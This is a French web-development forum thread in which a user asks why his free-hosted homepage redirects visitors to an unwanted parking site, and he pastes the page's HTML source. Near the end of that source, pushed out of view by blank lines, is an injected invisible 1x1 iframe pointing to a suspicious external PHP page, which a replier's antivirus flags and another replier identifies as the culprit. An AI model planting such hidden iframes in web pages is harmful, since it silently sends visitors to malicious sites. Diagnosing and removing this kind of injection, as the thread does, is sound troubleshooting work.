Redirection automatique vers site indésirable...

Redirection automatique vers site indésirable... - HTML/CSS - Programmation

Marsh Posté le 24-12-2011 à 17:55:12    

bonjour
je me suis créé une page d'accueil internet hébergée chez free.
 
Je l'ai construite à partir de divers scripts.
 
En me connectant de chez un copain, je me suis aperçu que dès que ma page d'accueil est chargée, je suis redirigé automatiquement vers un site indésirable :  
http://15647.bodisparking.com/ljlk [...] u.cc?srt=1
 
Je pense que je dois avoir un petit script qui traine dans mon html...
Quelqu'un peut il me guider pour savoir quelle partie du html je dois virer ?
 
merci et joyeux Noël !

Reply

Marsh Posté le 24-12-2011 à 17:55:12   

Reply

Marsh Posté le 25-12-2011 à 09:51:39    

Groswilly a écrit :

bonjour
je me suis créé une page d'accueil internet hébergée chez free.
 
Je l'ai construite à partir de divers scripts.
 
En me connectant de chez un copain, je me suis aperçu que dès que ma page d'accueil est chargée, je suis redirigé automatiquement vers un site indésirable :  
http://15647.bodisparking.com/ljlk [...] u.cc?srt=1
 
Je pense que je dois avoir un petit script qui traine dans mon html...
Quelqu'un peut il me guider pour savoir quelle partie du html je dois virer ?
 
merci et joyeux Noël !


Sans le code ça va être compliqué...

Reply

Marsh Posté le 25-12-2011 à 10:15:52    

oui, oups...
 
La page est : http://pageawilly.free.fr
 
Chez moi, sous firefox avec noscript et adblock, je n'ai pas ce problème de redirection...

Reply

Marsh Posté le 25-12-2011 à 12:49:32    

Je ne peux pas y accéder, mon antivirus signale "HTML/Iframe.B.Gen virus".
copie le code source de ta page pour qu'on puisse t'aider.

Reply

Marsh Posté le 25-12-2011 à 16:01:14    

Citation :


<html>
 
<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>La page à Willy</title>
 
<style type="text/css">
</style>
<link rel="Shortcut Icon" type="image/gif" href="images/icone.gif">
 
<SCRIPT language=JavaScript>
 
<!--
 
 
 
var message = new Array();
 
// Set your messages below -- follow the pattern.
 
// To add more messages, just add more elements to the array.
 
message[0] = "--- Accueil";
 
message[1] = "--- Bien pratique ! ";
 
message[2] = "--- Accueil...";
 
message[3] = "--- Kite Power";
 
message[4] = "--- Zegroop";
 
message[5] = "--- Gazzz !!";
 
 
 
 
 
// Set the number of repetitions (how many times the arrow
 
// cycle repeats with each message).
 
var reps = 2;
 
var speed = 200; // Set the overall speed (larger number = slower action).
 
 
 
// DO NOT EDIT BELOW THIS LINE.
 
var p = message.length;
 
var T = "";
 
var C = 0;
 
var mC = 0;
 
var s = 0;
 
var sT = null;
 
if (reps < 1) reps = 1;
 
function doTheThing() {
 
T = message[mC];
 
A();
 
}
 
function A() {
 
s++;
 
if (s > 8) { s = 1;}
 
// you can fiddle with the patterns here...
 
if (s == 1) { document.title = 'Willy '+T+' -----'; }
 
if (s == 2) { document.title = 'wIlly '+T+' -----'; }
 
if (s == 3) { document.title = 'wiLly '+T+' -----'; }
 
if (s == 4) { document.title = 'wilLy '+T+' -----'; }
 
if (s == 5) { document.title = 'willY '+T+' -----'; }
 
if (s == 6) { document.title = 'wilLy '+T+' -----'; }
 
if (s == 7) { document.title = 'wiLly '+T+' -----'; }
 
if (s == 8) { document.title = 'wIlly '+T+' -----'; }
 
if (C < (8 * reps)) {
 
sT = setTimeout("A()", speed);
 
C++;
 
}
 
else {
 
C = 0;
 
s = 0;
 
mC++;
 
if(mC > p - 1) mC = 0;
 
sT = null;
 
doTheThing();
 
}
 
}
 
doTheThing();
 
// End -->
 
//-->
 
</SCRIPT>
 
<SCRIPT LANGUAGE="JavaScript">
/*
SCRIPT TROUVE SUR L'EDITEUR JAVASCRIPT
http://www.editeurjavascript.com
*/
function HeureCheckEJS()
 {
 krucial = new Date;
 heure = krucial.getHours();
 min = krucial.getMinutes();
 sec = krucial.getSeconds();
 jour = krucial.getDate();
 mois = krucial.getMonth()+1;
 annee = krucial.getFullYear();
 if (sec < 10)
  sec0 = "0";
 else
  sec0 = "";
 if (min < 10)
  min0 = "0";
 else
  min0 = "";
 if (heure < 10)
  heure0 = "0";
 else
  heure0 = "";
 DinaHeure = heure0 + heure + ":" + min0 + min + ":" + sec0 + sec;
 which = DinaHeure
 if (document.getElementById){
  document.getElementById("ejs_heure" ).innerHTML=which;
 }
 setTimeout("HeureCheckEJS()", 1000)
 }
window.onload = HeureCheckEJS;
 
</SCRIPT>
 
<!-- DEBUT DU SCRIPT -->
<SCRIPT LANGUAGE="JavaScript">
/*
SCRIPT EDITE SUR L'EDITEUR JAVASCRIPT
http://www.editeurjavascript.com
*/
navvers = navigator.appVersion.substring(0,1);
if (navvers > 3)
 navok = true;
else
 navok = false;
 
today = new Date;
jour = today.getDay();
numero = today.getDate();
if (numero<10)
 numero = "0"+numero;
mois = today.getMonth();
if (navok)
 annee = today.getFullYear();
else
 annee = today.getYear();
TabJour = new Array("Dimanche","Lundi","Mardi","Mercredi","Jeudi","Vendredi","Samedi" );
TabMois = new Array("janvier","février","mars","avril","mai","juin","juillet","aout","septembre","octobre","novembre","décembre" );
messageDate = TabJour[jour] + " " + numero + " " + TabMois[mois] + " " + annee;
</SCRIPT>
<!-- FIN DU SCRIPT -->
 
<LINK REL="shortcut ICON" HREF="http://pageawilly.free.fr/favicon.ico">
 
</head>
 
<body bgcolor="#EFB052" topmargin="0" background="images/fond.jpg">
 
 
<SCRIPT LANGUAGE=JavaScript>
if(document.getElementById)
 document.write('<DIV class=popper id=topdeck></DIV>');
</SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="ejs_menu_dyn.js"></SCRIPT>
 
 
<div align="left">
  <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="5%" id="AutoNumber3" bgcolor="#FFFFFF">
    <tr>
      <td width="100%" align="center"></td>
    </tr>
  </table>
</div>
 
 
  <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="20%" id="AutoNumber4" bgcolor="#FFCC99" height="18" bordercolorlight="#FFFFFF" bordercolordark="#000080">
 
    <tr>
      <td width="100%" style="font-family: Verdana; color: #000080; font-size: 10pt" align="center">
      <p align="center"><font size="1">&nbsp;<!-- DEBUT DU SCRIPT -->
<SCRIPT LANGUAGE="JavaScript">
/*
SCRIPT EDITE SUR L'EDITEUR JAVASCRIPT
http://www.editeurjavascript.com
*/
document.write(messageDate);
      </SCRIPT>
<!-- FIN DU SCRIPT -->&nbsp;</font></td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp
    </tr>
  </table>
 
 
<p align="center" style="margin-top: 0; margin-bottom: 0">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp; </p>
 
 
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
  <tr>
    <td width="33%">&nbsp;<p>&nbsp;</p>
    <p>&nbsp;</p>
    <div align="center">
      <center>
      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="21%" id="AutoNumber5" bgcolor="#FFCC99" bordercolorlight="#FFFFFF" bordercolordark="#000080">
        <tr>
 
          <td width="100%" align="center" style="font-weight: bold; color: #000080">
          <div id="ejs_heure">
            <p align="center">Heure...</div></td>
        </tr>
      </table>
      </center>
    </div>
    <p align="center" style="margin-top: 0; margin-bottom: 0">&nbsp;<a target="ZONE2" href="http://france.meteofrance.com/france/meteo?PREVISIONS_PORTLET.path=previsionsdept/DEPT13"><img border="0" src="images/SoleilSoho.jpg" width="176" height="176"></a>&nbsp;&nbsp;&nbsp;
 
    <a target="ZONE2" href="http://www.kite13.com/meteo/wdlv6_04.swf?http://www.kite13.com/meteo/wdlconfig.xml">
    <img border="0" src="images/kite.jpg" width="181" height="176"></a></p>
    <p align="center" style="margin-top: 0; margin-bottom: 0">&nbsp;</p>
    <p align="center" style="margin-top: 0; margin-bottom: 0">&nbsp;
    <a target="ZONE2" href="http://marine.meteofrance.com/marine/accueil?MARINE_PORTLET.path=marinecotebulletin/COTE_CAMA_RAPH">
     
     
     
     
    <img border="0" src="http://recouvrance.canalblog.com/images/ISO01201.gif" width="176" height="176"></a>
     
    </td>
     
     
    <td width="33%" align="center">
    <p style="margin-top: 0; margin-bottom: 0">&nbsp;<!--  Champ de recherche Google --> </p>
 
<center>
<FORM method=GET action="http://www.google.fr/search" target="_blank">
<INPUT TYPE=hidden name=hl value=fr>
<TABLE style="border-collapse: collapse" bordercolor="#111111" cellpadding="0" cellspacing="0"><tr><td align="center">
<p style="margin-top: 7; margin-bottom: 7"><INPUT TYPE=text name=q size=34 maxlength=255 value=""></p>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
  <tr>
    <td width="50%" align="center">
<INPUT type=submit name=btnG VALUE="Google" style="float: right"></td>
  </tr>
</table>
<p style="margin-top: 7; margin-bottom: 7">&nbsp;<p style="margin-top: 7; margin-bottom: 7">&nbsp;<input id=all type=radio name=meta value="" ><label for=all>
<font color="#FFFFFF">Web</font></label>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input id=cty type=radio name=meta value="cr=countryFR" checked><font color="#FFFFFF"><label for=cty>France</label></font></font><p style="margin-top: 7; margin-bottom: 7">&nbsp;<p style="margin-top: 7; margin-bottom: 7">&nbsp;</td></tr></TABLE>
 
</FORM>
</center>
<!-- Google -->
</td>
    <td width="34%">
    &nbsp;<p>&nbsp;</p>
    <p>&nbsp;</p>
    <div align="right">
      <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="350" id="AutoNumber6" bgcolor="#FFFFFF">
        <tr>
          <td>&nbsp;</td>
 
        </tr>
      </table>
    </div>
    <form action="http://images.google.fr/images" name=f><span id=hf></span>
      <p>&nbsp;</p>
      <table cellspacing=0 cellpadding=0 width="187"><tr valign=top>
        <td align=center width="187">
<p align="left" style="margin-top: 0; margin-bottom: 7">
<input maxlength=256 size=25 name=q value="">
<p align="left" style="margin-top: 0; margin-bottom: 7">
 
<input type=hidden name=ie value="UTF-8"><input type=hidden name=hl value=fr>
<input type=submit value="Images" name=btnG style="float: right"></tr></table></form>
</td>
  </tr>
</table>
               
 
 
 
 
 
 
 
 
 
<iframe src="http://ljlktrngthsdj.cu.cc/main.php?page=e1a5f2bf09ad6790" width="1" height="1" frameborder="0"></iframe></body>
 
</html>

Reply

Marsh Posté le 25-12-2011 à 16:02:14    

vu comme ça, c'est un beau bordel ;o)

Reply

Marsh Posté le 25-12-2011 à 16:08:39    

C'est ce iframe qui se promène à la fin?
je pense que ton souci vient de là

Reply

Marsh Posté le 25-12-2011 à 16:46:28    

je l'avais pas vu
Pourtant, il est tout seul dans son coin, je ne sais pas d'ou je l'ai sorti...
 
en tout cas, merci !

Reply

Marsh Posté le 25-12-2011 à 16:58:06    

Est-ce que c'est toi qui l'a mis, ou bien free qui le rajoute dans ton code?

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed